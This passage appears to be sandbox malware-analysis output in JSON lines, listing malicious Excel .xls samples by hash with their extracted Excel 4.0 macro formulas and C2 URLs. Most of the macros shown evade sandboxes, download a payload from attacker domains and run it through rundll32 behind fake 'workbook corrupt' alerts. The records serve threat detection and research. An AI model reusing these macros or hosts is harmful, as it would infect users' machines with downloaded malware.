255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"dwJy4oNaGV\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4f1663ea08a9a90720acdb964bb28a784988bf68f2ae79e1ec1e32d6bdf84fe6"},"analysis":{"reported":"2020-04-09T16:16:14Z","score":10},"files":[{"filename":"4f1663ea08a9a90720acdb964bb28a784988bf68f2ae79e1ec1e32d6bdf84fe6","filesize":209408,"md5":"753493a700706918ab43ae0cc3eb7b6a","sha1":"61dd78f3a8bf570bc8982550245cf86850e0c3ff","sha256":"4f1663ea08a9a90720acdb964bb28a784988bf68f2ae79e1ec1e32d6bdf84fe6","sha512":"2b346bdf2d7faf785d754cfd18a643630e8496b93589f184364a8b4555c69056208510b26959a5ddd0ecccf3a0cebafcfc696f096bfba3c5d430a7ae1455e747","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4f1663ea08a9a90720acdb964bb28a784988bf68f2ae79e1ec1e32d6bdf84fe6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"yaxCR9kxjn\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4f170520b7dbd57db61d32094b2da0d8dc5c1e0c7b9e7bccdf915913c05d5b57"},"analysis":{"reported":"2020-04-09T16:16:14Z","score":10},"files":[{"filename":"4f170520b7dbd57db61d32094b2da0d8dc5c1e0c7b9e7bccdf915913c05d5b57","filesize":185344,"md5":"5395a6874a96be00690b9add1131e202","sha1":"86618e4c52f07925a1c05b283a5b01e35962b8f5","sha256":"4f170520b7dbd57db61d32094b2da0d8dc5c1e0c7b9e7bccdf915913c05d5b57","sha512":"c27503cb70860f0d384d8b67b91c6521af1dc11c1b8bda4e6186f2717d9ccfca6e196bf75314385358f299ec6b9de1eecff6a0dc3c653af1ff4a42269005bda2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4f170520b7dbd57db61d32094b2da0d8dc5c1e0c7b9e7bccdf915913c05d5b57.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4f188827664b1f82f535bfe7995b3004ded56d475db8c1a01476ea4e2eae9b1a"},"analysis":{"reported":"2020-04-09T16:16:14Z","score":10},"files":[{"filename":"4f188827664b1f82f535bfe7995b3004ded56d475db8c1a01476ea4e2eae9b1a","filesize":206336,"md5":"3bc18782e52fa15d6fc095a23bb394de","sha1":"08f33b3552ceef18c7cb9f6a0b176e0695386904","sha256":"4f188827664b1f82f535bfe7995b3004ded56d475db8c1a01476ea4e2eae9b1a","sha512":"e8d8e2ee001b6b9124b0796ea05b0cfbd5eb5d66669541209f61200d6cffdfbdf1b113ee203d707d29d3f5c3397a93cc5fca58138058f63ea37c9cfef6b95318","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4f188827664b1f82f535bfe7995b3004ded56d475db8c1a01476ea4e2eae9b1a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"TJvPN6FGPL\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4f22114b4779d8422e3a90989e9b7cb35341f252242e7e88ca66de7bb67b319c"},"analysis":{"reported":"2020-04-09T16:16:15Z","score":10},"files":[{"filename":"4f22114b4779d8422e3a90989e9b7cb35341f252242e7e88ca66de7bb67b319c","filesize":167936,"md5":"7432c94470c3e98b82d24a46cfeb4abd","sha1":"b965720db3683f48bf8a8eca8539c1657c46a8d6","sha256":"4f22114b4779d8422e3a90989e9b7cb35341f252242e7e88ca66de7bb67b319c","sha512":"6274e199f80ab26698982761abd9f98f0241df732f00b645eb1f2e5343de528c30b52b0a171a1689bd6f84bb3f0cd2e9238478f26ddd0c839a0bdd50311df23a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4f22114b4779d8422e3a90989e9b7cb35341f252242e7e88ca66de7bb67b319c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"yN6ZA5IDDU\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4f249a406c46c060f7056be2f6d8605e6ebc75b3d5b02efa449e47e544165244"},"analysis":{"reported":"2020-04-09T16:16:15Z","score":10},"files":[{"filename":"4f249a406c46c060f7056be2f6d8605e6ebc75b3d5b02efa449e47e544165244","filesize":109568,"md5":"a3d2bbfd2b0dfb61b29aaea211509a1c","sha1":"a0fddbb52da4c50f139bc56d894c639c8127f9bb","sha256":"4f249a406c46c060f7056be2f6d8605e6ebc75b3d5b02efa449e47e544165244","sha512":"91ff27d2844f5fdbde5849734641ef84fdf402812d84dc8095c98a4fe203883b92b65f8ea8ae52a031aaf772c5abb60332751a02f132f3c97006aa857676175f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4f249a406c46c060f7056be2f6d8605e6ebc75b3d5b02efa449e47e544165244.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wgyafqtc.online/fgwg24g24g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(13)\u003c770,CLOSE(FALSE),)\nIF(GET.WORKSPACE(14)\u003c381,CLOSE(FALSE),)\nRETURN()\nRETURN()\nWORKBOOK.HIDE(\"G5cQ0unqLm\",TRUE)\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4f2c12a1016d961c18870ff551fe18e36aa03074e9da6cb49a1555f8e3b686fc"},"analysis":{"reported":"2020-04-09T16:16:15Z","score":10},"files":[{"filename":"4f2c12a1016d961c18870ff551fe18e36aa03074e9da6cb49a1555f8e3b686fc","filesize":209920,"md5":"d13e5c069b97c51cd8b3b9f1d140a4ec","sha1":"0f0dce5c9b41432651aa6086d41cc5ac4cab90f3","sha256":"4f2c12a1016d961c18870ff551fe18e36aa03074e9da6cb49a1555f8e3b686fc","sha512":"799b88187fdb846484521965d92ea5d2c3ba8883190203652863a82964f77fdbe3d067f90f7d0dee1ed21937752691e6a70f0a4aa77a2a24aea6bea14ee9622e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4f2c12a1016d961c18870ff551fe18e36aa03074e9da6cb49a1555f8e3b686fc.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"teMUHyNYms\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4f52bc4a7926d9c65b2324dd193cb8917ab65f9c53248cf6fe6052bebb7ea5db"},"analysis":{"reported":"2020-04-09T16:16:15Z","score":10},"files":[{"filename":"4f52bc4a7926d9c65b2324dd193cb8917ab65f9c53248cf6fe6052bebb7ea5db","filesize":132608,"md5":"11797f8ca42b2d9952045ac66300afda","sha1":"fbfd66589b7bd4349ffc9a4661c458dfcdd0a8bd","sha256":"4f52bc4a7926d9c65b2324dd193cb8917ab65f9c53248cf6fe6052bebb7ea5db","sha512":"5bc391db293e7ccda34a05d8f62774bd593493849dce6faf33968fa4e3a96b8687871f225be8d51fa237eeb2fa9b888cdf01262af5a460a32de569b002087d22","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4f52bc4a7926d9c65b2324dd193cb8917ab65f9c53248cf6fe6052bebb7ea5db.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rosannahtacey.xyz/vg43"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rosannahtacey.xyz/vg43\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"SG4bofoW9C\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4f5727adb993f14f16f53a037e4292193675196e5f5efade881e98fb41449e7a"},"analysis":{"reported":"2020-04-09T16:16:15Z","score":10},"files":[{"filename":"4f5727adb993f14f16f53a037e4292193675196e5f5efade881e98fb41449e7a","filesize":185344,"md5":"aa83760cb820c3283080a8b555271ccd","sha1":"3352a2eb47fc3ccd57963775fc70b6bb2f4a3f14","sha256":"4f5727adb993f14f16f53a037e4292193675196e5f5efade881e98fb41449e7a","sha512":"c813e710eb37bcd77833509598a8e39922e447a686cc5e550d5a95dcd5e1e66b6a81a90be2e300684c134a39a9475b5241da692b9ddf7dff3e0e2df58b52de09","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4f5727adb993f14f16f53a037e4292193675196e5f5efade881e98fb41449e7a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4f5d02e7e67010d728895daf070eb6d5d23a434a493fbf1c6ef263302461bdd0"},"analysis":{"reported":"2020-04-09T16:16:15Z","score":10},"files":[{"filename":"4f5d02e7e67010d728895daf070eb6d5d23a434a493fbf1c6ef263302461bdd0","filesize":144384,"md5":"38670c605549f09c7c17bd397d2b3d7d","sha1":"31b420b701a207f16a3d4b93d3cfab49d3d4ffcc","sha256":"4f5d02e7e67010d728895daf070eb6d5d23a434a493fbf1c6ef263302461bdd0","sha512":"f8d9c965889eae6d6e2f8dbb0f225fdef9b369d87691faa3c1c233e30e0c2dd11fee810f20a2397aae74ee37b340f1e7ab052d7f9d5508cbd0d069a27709c417","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4f5d02e7e67010d728895daf070eb6d5d23a434a493fbf1c6ef263302461bdd0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"dleUQD2hpF\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4f7fcde1f8b9a3fb9a6977b276329b169cd3ed1d5816f2f505fb3508e429290e"},"analysis":{"reported":"2020-04-09T16:16:15Z","score":10},"files":[{"filename":"4f7fcde1f8b9a3fb9a6977b276329b169cd3ed1d5816f2f505fb3508e429290e","filesize":185344,"md5":"4dedde374cbec85ddffd7bf68352b1ba","sha1":"cd926b3bb53949ebffc2cf4431b83fed047afa1d","sha256":"4f7fcde1f8b9a3fb9a6977b276329b169cd3ed1d5816f2f505fb3508e429290e","sha512":"02e5bdbe76bcee32cca761030d0310572311f3e7636b9ae4b86b8f87bcdfd2161a69ea073c95317be440522e0ad1ed74383a4e09637f051261c489dd183897c6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4f7fcde1f8b9a3fb9a6977b276329b169cd3ed1d5816f2f505fb3508e429290e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4f8bb20d6e1d0965a7793b8f577fedb55d779f93e50a524a976fd482b6466579"},"analysis":{"reported":"2020-04-09T16:16:15Z","score":10},"files":[{"filename":"4f8bb20d6e1d0965a7793b8f577fedb55d779f93e50a524a976fd482b6466579","filesize":185344,"md5":"33a5f5b90250b38be41d53f4300bdb61","sha1":"5e7f053c556406cd7966f84cb913c3d35b74a062","sha256":"4f8bb20d6e1d0965a7793b8f577fedb55d779f93e50a524a976fd482b6466579","sha512":"d341f2a59e6b561114953986c56bd88bfb7898b42b89c36fd4506001cda3d56b8c66cf6f59c2c28f67b45c0b048a4d0e0a08589637a6bcbf2d176d5595da139a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4f8bb20d6e1d0965a7793b8f577fedb55d779f93e50a524a976fd482b6466579.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4f935931b33aa538d5d981fd9e531bc7f4f49fa76d970a0afade262f6bc5f1a5"},"analysis":{"reported":"2020-04-09T16:16:15Z","score":10},"files":[{"filename":"4f935931b33aa538d5d981fd9e531bc7f4f49fa76d970a0afade262f6bc5f1a5","filesize":185344,"md5":"c6b203c7161f70884024842822f64a19","sha1":"f9e50432ae2b68653df77cdacbfa6c241b83dfca","sha256":"4f935931b33aa538d5d981fd9e531bc7f4f49fa76d970a0afade262f6bc5f1a5","sha512":"0ce4197ffebb4fd983810cceb262de7631b769711a76769a7802ea18e973b9d40fcddb35d4a6dc47584e8db1d9ff31b36cb8c09e238b7f61e34afbd4aedbd932","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4f935931b33aa538d5d981fd9e531bc7f4f49fa76d970a0afade262f6bc5f1a5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4f96d41fd74bc07e805b2bb2332d3a578a01fcea179214a7e4c6b33f8090a131"},"analysis":{"reported":"2020-04-09T16:16:15Z","score":10},"files":[{"filename":"4f96d41fd74bc07e805b2bb2332d3a578a01fcea179214a7e4c6b33f8090a131","filesize":116224,"md5":"5686e6951c06b49e3e4d05f72eb96810","sha1":"98da499df3f2a55e3be9020f24f9cafd9069ea20","sha256":"4f96d41fd74bc07e805b2bb2332d3a578a01fcea179214a7e4c6b33f8090a131","sha512":"4f58ad814a6d2215b9409b525672da90c56fc1b65cd020b918266c993d87eac38b2b4ab5753d826e9ff76bfba9c77778e38e7dc2f5e414699d52a3c078cc7d96","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4f96d41fd74bc07e805b2bb2332d3a578a01fcea179214a7e4c6b33f8090a131.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"dDt29ah7Lu\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4f9abce44c9ebaddb28bd7359d67803f2e8d06ec3c669a7f159cf88a9a29d261"},"analysis":{"reported":"2020-04-09T16:16:15Z","score":10},"files":[{"filename":"4f9abce44c9ebaddb28bd7359d67803f2e8d06ec3c669a7f159cf88a9a29d261","filesize":104448,"md5":"c61e627637044f961631e6ab234b30f4","sha1":"3c396b404680d5928b8fcac0bd4c6a17c56969b4","sha256":"4f9abce44c9ebaddb28bd7359d67803f2e8d06ec3c669a7f159cf88a9a29d261","sha512":"952109e75898dda1af7d6e53dd8176ee8eb8ffd82ba8b88b6db524d2cd61eb951fb3389a3d72d8a708030f78e9c836f315184709a443fe4dda466c2398295507","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4f9abce44c9ebaddb28bd7359d67803f2e8d06ec3c669a7f159cf88a9a29d261.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"q06ocC8M1s\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4f9bc8b706e08e1baf87bd2ccb806dbcce8bc45f3a26bb8739abcff18124632d"},"analysis":{"reported":"2020-04-09T16:16:15Z","score":10},"files":[{"filename":"4f9bc8b706e08e1baf87bd2ccb806dbcce8bc45f3a26bb8739abcff18124632d","filesize":204800,"md5":"7c34ed5a1e7aef73c6ccac7401d60450","sha1":"cbe665813ca5fd4b73f8eb56f9c7b8e630fd8c28","sha256":"4f9bc8b706e08e1baf87bd2ccb806dbcce8bc45f3a26bb8739abcff18124632d","sha512":"460def2cc98dbad6c1a76bdafd150bf9394929dd5b74b595654c9659133d7a331d20604f5ffe325cc1bc3188e8361b4437d9d5ecf6cdca121d3ac78ff2f11402","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4f9bc8b706e08e1baf87bd2ccb806dbcce8bc45f3a26bb8739abcff18124632d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,HALT())\nIF(GET.WORKSPACE(42),,HALT())\nFOPEN(\"C:\\Users\\Public\\1.vbs\",3)\nMESSAGE(TRUE,\"One moment please...\")\nIF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),EXEC(GET.NOTE(R$34C$3)),)\nIF(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2),EXEC(GET.NOTE(R$36C$3)),)\nHALT()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4fb5449a3904cd6b5a5b5f8a84f6cefc482678afc10d89cec4123ed2f621263a"},"analysis":{"reported":"2020-04-09T16:16:15Z","score":10},"files":[{"filename":"4fb5449a3904cd6b5a5b5f8a84f6cefc482678afc10d89cec4123ed2f621263a","filesize":152576,"md5":"0ee43380d3b26e16570e5eb3154be611","sha1":"a07040cc3d620f8e8ecddfebc9b0f7c581a3c037","sha256":"4fb5449a3904cd6b5a5b5f8a84f6cefc482678afc10d89cec4123ed2f621263a","sha512":"728af5bc5174ee006092a07503d28778e80eb1a8a693ebdbb0a7fd9560f478932045f7c0ce5c5cb0acc8706cdd6f1ef8885e11a7e74de5fd6c0343277c157376","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4fb5449a3904cd6b5a5b5f8a84f6cefc482678afc10d89cec4123ed2f621263a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"UXuawC5q6F\",TRUE)\nGOTO(R$1C$10)"}}}]}
